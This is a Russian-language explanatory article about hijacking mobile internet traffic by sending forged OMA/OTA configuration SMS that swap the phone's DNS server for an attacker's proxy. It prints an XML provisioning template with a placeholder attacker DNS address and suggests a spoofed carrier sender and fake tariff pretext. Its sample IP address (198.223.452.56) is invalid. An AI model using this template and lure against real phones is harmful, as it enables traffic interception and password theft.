Почти все функции современных смартфонов связаны с доступом к Интернет-ресурсам и несут потенциальную угрозу безопасности

Безопасность выхода в Интернет с персонального компьютера — это одна из важнейших функций всех антивирусных продуктов. Посещение Интернет-страниц при отсутствии должного уровня защиты может обернуться похищением паролей, передачей конфиденциальных данных злоумышленнику и отслеживанием переписки, как через электронную почту, так и через сайты социальных сетей, таких как «Одноклассники» или «ВКонтакте».

Но посещение Интернет-ресурсов с мобильного телефона — гораздо более опасно, а вот должной защиты или хотя бы каких-то по-настоящему эффективных антивирусных пакетов, которые защищали бы пользователя, нет. Если принять во внимание, что даже защищаемые всеми возможными способами Интернет-соединения с персонального компьютера периодически подвергаются успешным атакам злоумышленников, то мобильный выход в Интернет становится сродни безвозмездной передачи данных мошенникам. Атакующий может не только отслеживать все Интернет-ресурсы, которые вы посетили с сотового телефона, но и перехватывать все пароли. Это могут быть пароли к личному почтовому ящику, к профилям в социальных сетях, к ICQ.

Данная атака строится на использовании современного механизма удаленной настройки мобильных устройств, разработанного и внедряемого корпорацией «Open Mobile Alliance». Данная корпорация объединила ведущих производителей мобильных устройств и сотовых операторов с целью стандартизации мобильных технологий и разработки новых сервисов. Одним из существенных достижений альянса стала технология ОМА, получившая такое название в честь корпорации.

Схема функционирования DNS-сервера в сети мобильного оператора

 

Суть новой разработки заключается в следующем. С помощью специальных SMS-сообщений можно осуществить переконфигурацию сотового телефона для подключения таких служб, как Интернет, синхронизация с персональным компьютером, поддержка MMS-сообщений, загрузка необходимых приложений из сети. Ручная конфигурация этих услуг достаточно сложна, так как для каждого сотового оператора и для каждой модели телефона существуют свои тонкости, поэтому настройка необходимых параметров для неопытных пользователей — задача неразрешимая.

Конфигурирующие сообщения для последних моделей телефонов имеют название ОМА-настройки. Для более старых моделей подобные операции получили название ОТА-настройки. Почти все мобильные устройства в настоящее время поддерживают процедуры одного из двух типов. Сам механизм настроек достаточно гибок, поэтому данная технология постепенно завоевывает рынок. Частные организации нередко прибегают к разработке собственных процедур для конфигурирования корпоративных телефонов сотрудников. Иногда такими услугами пользуются банки, что помогает им настроить мобильные кошельки на телефонах пользователей.

Схема функционирования доступа в Интернет с мобильного телефона после атаки с подменной DNS

 

Для конфигурации мобильного устройства необходимо правильно составить текст настройки для каждого конкретного производителя и конкретной модели телефона. Языком описания процедуры является XML. Стандартные правила, по которым производятся настройки, можно скачать с сайта «Open Mobile Alliance». После того, как XML-файл сформирован, он переводится в бинарный вид с помощью специальных конверторов. После этого, сформированное сообщение может быть отправлено через специальные SMS-шлюзы.

То есть любой пользователь может самостоятельно сформировать конфигурацию, подписаться любым отправителем и отправить ее на произвольный мобильный телефон.

Отметим, что изначально ОМА/ОТА-настройки были спроектированы для того, чтобы обеспечить пользователю возможность удаленного конфигурирования телефона для выхода в сеть Интернет. Дело в том, что каждый оператор сотовой связи имеет свои настройки, которые необходимо установить на телефоне для выхода в сеть. Одним из таких параметров является IP-адрес DNS-сервера.

Именно эти сведения использует злоумышленник для «прослушивания» всех Интернет-соединений. Проанализируем его арсенал и методы осуществления атаки. Целью мошенника является такое переконфигурирование сотового телефона, которое изменяет адрес используемого DNS-сервера.

DNS-сервер обеспечивает трансляцию имен сайтов в IP-адреса. Каждый компьютер в сети Интернет имеет два основных идентификатора — это доменное имя и IP-адрес. Так, например, доменное имя сайта книги www.virus2.ru, а его IP-адрес 198.223.452.56. IP-адресов у компьютера может быть несколько и количество имен тоже может быть более одного. Причем имена ресурсов могут связываться как с одним, так и с несколькими IP-адресами. Компьютер может вообще не иметь доменного имени. Именно сопоставлением IP-адреса и указателя домена занимается DNS-сервер. Алгоритмы, которые использует DNS-сервер, нас не интересуют.

Важно, что в мобильном телефоне при настройке выхода в сеть Интернет прописывается адрес используемого DNS-сервера. К этому серверу каждый раз происходит обращение для того, чтобы получить IP-адрес ресурса, к которому хочет обратиться пользователь беспроводного устройства.

Так, если абонент хочет открыть на экране сайт www.virus2.ru, то сотовый телефон обратится к DNS-серверу, и получит от него адрес 198.223.452.56, к которому и будет произведен запрос.

Но злоумышленник может подменить DNS-сервер. Тогда вместо 198.223.452.56 мобильное устройство получит от DNS-сервера совсем другой IP-адрес. Как правило, это указатель Proxy-сервера злоумышленника, который ретранслирует через себя все запросы пользователя. При этом Proxy-сервер ведет подробный список всех ресурсов, к которым обращалась жертва, перехватывает все пароли.

Если сервер настроен определенным образом, то он может вместо доступа к ресурсам, которые хочет увидеть атакуемый абонент, перенаправить его на альтернативные сайты. А это дает обширные возможности для мошенничества.

Но ключом к реализации подобной атаки является именно подмена DNS-сервера в настройках мобильного телефона.

Для того чтобы ее осуществить злоумышленник формирует следующую автоматическую процедуру.

<wap-provisioningdoc>
<characteristic type=»NAPDEF»>
<parm name=»NAME» value=»NewAPN»/>
<parm name=»NAPID» value=»NewAPN NAPID ME»/>
<parm name=»BEARER» value=»GSM.GPRS»/>
<parm name=»NAP.ADDRESS» value=»apn . new . com»/>
<parm name=»NAP.ADDRTYPE» value=»APN»/>
<parm name=»DNS.ADDRESS» value=»x . у .w. z «/>
</characteristic>
<characteristic type=»APPUCATION»>
<parm name=»NAME» value=»NewAPN»/>
<parm name=»APPID» value=»w2″/>
<parm name=»TO.NAPID» value=»NewAPN NAPID ME»/>
</characteristic>
</wap-provisioningdoc>

Не будем останавливаться на правилах составления настроек. Скажем лишь, что в каждом теге прописывается то или иное значение определенных параметров телефона. Так в поле DNS.ADDRESS указывается адрес DNS-злоумышленника. Остальные поля устанавливаются таким же образом, как и в стандартной настройке сотового оператора.

При получении конфигурационного сообщения на экране телефона появится предложение принять настройку. Так как злоумышленник может подписать настройку произвольным образом, то убедить жертву ее принять не так сложно. Можно подписать ее как «Перенастройка Интернета в связи со снижениями тарифа». А в качестве телефона отправителя уже известным нам способом можно указать, например, Beeline.

Как это ни парадоксально, но полностью обезопасить себя от перехвата Интернет-трафика можно только полностью отказавшись от использования сотового телефона для выхода в сеть. Остается только ждать, когда для мобильных устройств будут разработаны хотя бы простейшие антивирусные системы, способные бороться с Интернет-мошенничеством.